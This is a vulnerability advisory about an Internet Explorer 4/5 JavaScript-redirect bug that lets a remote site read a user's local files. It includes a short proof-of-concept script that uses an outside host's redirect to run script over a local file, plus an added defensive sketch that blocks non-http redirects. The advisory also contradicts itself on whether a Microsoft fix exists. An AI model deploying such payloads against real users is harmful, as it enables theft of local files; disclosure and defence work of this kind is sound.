Internet Explorer vulnerable to a 'JavaScript redirect' bug that allows
reading of local files
--------------------------------------------------------------------------------
SUMMARY
Internet Explorer 4.01 and 5.0 are vulnerable to a redirect attack that
allows malicious web site operators to read local files of users using
Internet Explorer 5 with JavaScript enabled.
Microsoft is aware of this issue, but has not released a patch for this
vulnerability yet.
DETAILS
A remote web site can retrieve the contents of local text files on the
user's computer by using a URL redirect to JavaScript code. This bypasses
the domain restriction and executes the script under elevated permissions.
Exploit Code
The following exploit code lets you create a text file, and then lets the
remote server read this file:
<SCRIPT>
alert("Create a short text file C:\\TEST.TXT and it will be read and shown in a dialog box");
a=window.open("file://c:/test.txt");
a.location="http://www.nat.bg/~joro/reject.cgi?jsredir1";
</SCRIPT>
// "http://www.nat.bg/~joro/reject.cgi?jsredir1" just does an HTTP redirect to: "javascript:alert(document.body.innerText)"
Fix Information
Microsoft has not issued a patch for this problem yet. The suggested
workaround is to disable JavaScript in the Internet zone.
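The redirect to a javascript: URL described above can be refused on the client side by parsing the Location header and following only http and https targets. The sketch below is an added example, not Microsoft's fix and not code from this advisory; checkRedirect and REDIRECT_SCHEMES are hypothetical names and the example.test URLs are constructed.

```javascript
// Added illustration; function and constant names are hypothetical.
// Schemes a redirect is allowed to lead to. Everything else
// (javascript:, vbscript:, data:, file:, ...) is refused instead of
// being handed to the navigation code.
const REDIRECT_SCHEMES = new Set(["http:", "https:"]);

// Decide whether a 3xx response may be followed.
//   requestUrl - absolute URL that was requested
//   location   - raw Location header value from the response
// Returns { follow, reason } plus target (absolute URL) when allowed.
function checkRedirect(requestUrl, location) {
  let target;
  try {
    // A real URL parser resolves relative values and normalises the
    // scheme (case, surrounding whitespace), which a string-prefix
    // comparison would get wrong.
    target = new URL(location, requestUrl);
  } catch (err) {
    return { follow: false, reason: "unparseable Location header" };
  }
  if (!REDIRECT_SCHEMES.has(target.protocol)) {
    return {
      follow: false,
      reason: "scheme " + target.protocol + " not allowed in a redirect",
    };
  }
  return { follow: true, reason: "ok", target: target.href };
}

// Constructed sample responses: [requested URL, Location header].
const samples = [
  ["http://example.test/reject.cgi?jsredir1",
   "javascript:alert(document.body.innerText)"],  // the case in this advisory
  ["http://example.test/a", "file:///c:/test.txt"],  // remote page to local file
  ["http://example.test/a", " JaVaScRiPt:alert(1)"], // case and whitespace variant
  ["http://example.test/a", "/b?x=1"],               // ordinary relative redirect
];
for (const [req, loc] of samples) {
  console.log(JSON.stringify(loc), "->", JSON.stringify(checkRedirect(req, loc)));
}
```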
ADDITIONAL INFORMATION
This vulnerability (like most IE-related security holes) was discovered
by Georgi Guninski.
Microsoft has issued a security advisory on this issue which can be found
at: http://www.microsoft.com/security/bulletins/MS99-043faq.asp